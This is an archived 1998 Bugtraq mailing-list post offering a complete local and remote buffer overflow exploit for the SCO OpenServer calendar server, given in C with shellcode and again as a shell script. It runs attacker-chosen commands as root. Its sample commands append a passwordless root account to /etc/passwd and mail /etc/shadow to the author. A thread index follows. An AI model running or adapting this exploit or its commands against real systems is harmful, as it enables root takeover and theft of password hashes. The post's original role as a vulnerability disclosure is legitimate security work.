Bugtraq mailing list archives
Local/remote exploit for SCO UNIX.
From: leshka () LESHKA CHUVASHIA SU (leshka)
Date: Tue, 29 Dec 1998 19:22:03 +0300
/* ... The punishment for inobedience ... This is a local/remote buffer overflow exploit for calserver bug (SCO OpenServer Enterprise System v 5.0.4p). If you have any problems with it, drop me a letter. Happy New Year ! *** Brief manual *** Local mode is a default mode for the calendar server. If calserver runs on your site in this mode just try to run the exploit with only argument "local". If calserver operates on your or other sites in the network mode you should use exploit with two arguments: "<sitename>" and "<portnumber>". Portnumber is usually equal to 6373 but other values are possible. Don't use "localhost" or "127.0.0.1" as a <sitename>. Check "/usr/lib/scosh/calargs" file to see the current mode of the calendar server. Execution of the exploit is similar to a blind execution of the following command with root permissions: "/bin/sh -c <command>". There are a few limitations for number and length of commands. The length of a command should not exceed 75 symbols. The number of executable commands depends on calserver configuration and it is equal to the number of child calendar servers which are basically 4 by default. Therefore running of this exploit must be very effective. You are free to use sequences of a shell commands separated by ";" as a <command>. 9.999,99 ---------------------- --------------------------------------------- ----------------- Dedicated to my beautiful lady ------------------ --------------------------------------------- ---------------------- Leshka Zakharoff, 1998. E-mail: leshka () leshka chuvashia su */ #include <stdio.h> #include <fcntl.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> main(argc, argv) int argc; char *argv[]; { #define calserver_pipe "/usr/lib/scosh/pipes/pdg18e5_0000" #define start_addr 0x7ffffd80 #define hostnamelen 100 #define portnumberlen 10 #define cmdlen 80 char hostname[hostnamelen],portnumber[portnumberlen],cmd[cmdlen]; char *hn,*pn; int s; struct sockaddr_in sin; struct hostent *hp, *gethostbyname(); char msg[850]; char *msghdr= "\x00\x00\x00\x00" // message length "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\xff\xff\xff" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" // packet_sz "\x1c\x00\x00\x00" // opcode "\x00\x00\x00\x00"; // maxmsgsz char codes[]= { "\xeb\x7f" //start : jmp cont "\x5d" //geteip: popl %ebp "\x55" // pushl %ebp "\xfe\x4d\x98" // decb 0xffffff98(%ebp) "\xfe\x4d\x9b" // decb 0xffffff9b(%ebp) "\xfe\x4d\xe7" // decb 0xffffffe7(%ebp) "\xfe\x4d\xeb" // decb 0xffffffeb(%ebp) "\xfe\x4d\xec" // decb 0xffffffec(%ebp) "\xfe\x4d\xed" // decb 0xffffffed(%ebp) "\xff\x45\xef" // incl 0xffffffef(%ebp) "\xfe\x4d\xf4" // decb 0xfffffff4(%ebp) "\xc3" // ret "/bin/sh" // "\x01" // 0xffffff98(%ebp) "-c" "\x01" // 0xffffff9b(%ebp) " " " " "\x01" // 0xffffffe7(%ebp) "\x8d\x05\x3b\x01\x01\x01" //execv : leal 0x3b,%eax "\x9a\xff\xff\xff\xff\x07\x01" // lcall 0x7,0x0 "\xc7\xc4\xff\xff\xff\xff" //cont : movl $0xXXXX,%esp "\xe8\x76\xff\xff\xff" // call geteip "\x33\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x81\xc5\x9c\xff\xff\xff" // addl $0xffffff9c,%ebp "\x55" // pushl %ebp "\x81\xc5\xfd\xff\xff\xff" // addl $0xfffffffd,%ebp "\x55" // pushl %ebp "\x81\xc5\xf8\xff\xff\xff" // addl $0xfffffff8,%ebp "\x55" // pushl %ebp "\x55" // pushl %ebp "\x5b" // pop %ebx "\x8b\xec" // movl %esp,%ebp "\x50" // pushl %eax "\x55" // pushl %ebp "\x53" // pushl %ebx "\x50" // pushl %eax "\xeb\xc6" // jmp execv }; if (argc<2) { printf("Host [local] : "); gets(hostname); if (!strlen(hostname)) strcpy(hostname,"local"); hn=hostname; } else hn=argv[1]; if ((argc<3)&&strcmp("local",hn)) { printf("Port [6373] : "); gets(portnumber); if (!strlen(portnumber)) strcpy(portnumber,"6373"); pn=portnumber; } else pn=argv[2]; printf("Type a command (max length=75), for example :\n"); printf("\"echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd\"\n"); printf("\"mail leshka () leshka chuvashia su</etc/shadow\"\n"); printf(" <-----------------------------------75"); printf("------------------------------------>\n>"); gets(cmd); memcpy(codes+40,cmd,strlen(cmd)); memset(msg,'\x90',600); memcpy(msg,msghdr,52); *(unsigned long*) (msg+201)= *(unsigned long*) (codes+131) = start_addr; memcpy(msg+600,codes,strlen(codes)); if (!strcmp("local",hn)) { * (unsigned long*) msg = (unsigned long) (600+strlen(codes)-4); if ((s=open(calserver_pipe,O_WRONLY)) == -1) { printf("Error opening calserver pipe\n"); exit(1); }; if (write(s,msg,600+strlen(codes)) == -1) { printf("Error writing to the calserver pipe\n"); exit(1); }; exit(0); }; hp = gethostbyname(hn); if (hp == 0) { herror("gethostbyname"); exit(1); } memcpy(&sin.sin_addr,hp->h_addr,hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(atoi(pn)); if ((s = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { perror("socket"); exit(1); } if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) == -1) { perror("connect"); exit(1); } if (write(s, msg+12,600-12+strlen(codes)) == -1) { perror("write"); exit(1); } close(s); } *** Shell version *** #!/bin/sh # # ... The punishment for inobedience ... # # This is a local/remote buffer overflow exploit for calserver bug # (SCO OpenServer Enterprise System v 5.0.4p). # If you have any problems with it, drop me a letter. # Happy New Year ! # # # *** Brief manual *** # # Local mode is a default mode for the calendar server. If calserver # runs on your site in this mode just try to run the exploit with only # argument "local". If calserver operates on your or other sites in the # network mode you should use exploit with two arguments: "<sitename>" and # "<portnumber>". Portnumber is usually equal to 6373 but other values are # possible. Don't use "localhost" or "127.0.0.1" as a <sitename>. Check # "/usr/lib/scosh/calargs" file to see the current mode of the calendar # server. # Execution of the exploit is similar to a blind execution of the # following command with root permissions: "/bin/sh -c <command>". # There are a few limitations for number and length of commands. The # length of a command should not exceed 75 symbols. The number of # executable commands depends on calserver configuration and it is equal to # the number of child calendar servers which are basically 4 by default. # Therefore running of this exploit must be very effective. You are free # to use sequences of a shell commands separated by ";" as a <command>. # # 9.999,99 # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1998. E-mail: leshka () leshka chuvashia su # # # calserver_pipe="/usr/lib/scosh/pipes/pdg18e5_0000" msg="/tmp/msg" msghdr1='\02\03\0\0\0\0\0\0\0\0\0\0' msghdr2='\0\0\0\0\0\0\0\0\0377\0377\0377\0377\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0'\ '\0\0\0\0\034\0\0\0\0\0\0\0' codes1='\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0200\0375\0377\0177\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220\0220'\ '\0353\0177]U\0376M\0230\0376M\0233\0376M\0347\0376M\0353\0376M\0354\0376M'\ '\0355\0377E\0357\0376M\0364\0303/bin/sh\01-c\01' codes2='\01\0215\05;\01\01\01\0232\0377\0377\0377\0377\07\01\0307\0304\0200'\ '\0375\0377\0177\0350v\0377\0377\03773\0300P\0201\0305\0234\0377\0377\0377U'\ '\0201\0305\0375\0377\0377\0377U\0201\0305\0370\0377\0377\0377UU[\0213\0354'\ 'PUSP\0353\0306' rm -f $msg if [ _$1 = "_" ] then { echo -n "Host [local] :" read hostname if [ _$hostname = "_" ] then hostname="local" fi } else hostname=$1 fi if [ _$hostname = "_local" ] then if [ -p $calserver_pipe ] then echo -n $msghdr1>$msg else echo "Error opening calserver pipe" exit 1 fi else if [ _$2 = "_" ] then { echo -n "Port [6373] :" read portnumber if [ _$portnumber = "_" ] then portnumber="6373" fi } else portnumber=$2 fi fi echo "Type a command (max length=75), for example :" echo '"echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd"' echo '"mail leshka () leshka chuvashia su</etc/shadow"' echo -n " <-----------------------------------75" echo -n "------------------------------------>\n>" read c echo -n $msghdr2$codes1>>$msg printf "%75s" "$c">>$msg echo -n $codes2>>$msg if [ _$hostname = "_local" ] then cat $msg>>$calserver_pipe else { echo -n '\0377\0377\0377\0377'>>$msg cat $msg|/etc/ttcp -u -t -l762 -p$portnumber $hostname } fi rm $msg
Current thread:
- Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service, (continued)
- Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service David Schwartz (Dec 23)
- The grand-son of Cuartango Hole aleph1 () UNDERGROUND ORG (Dec 23)
- Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service Guido van Rooij (Dec 24)
- lame old finger bounce bug still exists in sparc 2.7 spoon (Dec 26)
- Breeze Network Server remote reboot and other bogosity. //Stany (Dec 26)
- [patch] fix for urandom read(2) not interruptible Andrea Arcangeli (Dec 27)
- Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service Jeff Roberson (Dec 28)
- Oracle8 TNSLSNR DoS Jason Ackley (Dec 28)
- ssh2 security problem (and patch) (fwd) Darren Reed (Dec 29)
- Comparison of THC-SCAN v2.0 with Sandstorm PhoneSweep 1.02 Simson L. Garfinkel (Dec 29)
- Local/remote exploit for SCO UNIX. leshka (Dec 29)
- followup on yahoo pager security problem Neulinger, Nathan R. (Dec 29)
- Nmap 2.02 released (fwd) Chris Tobkin (Dec 29)
- netscan.org - broadcast ICMP list Troy Davis (Dec 29)
- Administrivia Aleph One (Dec 30)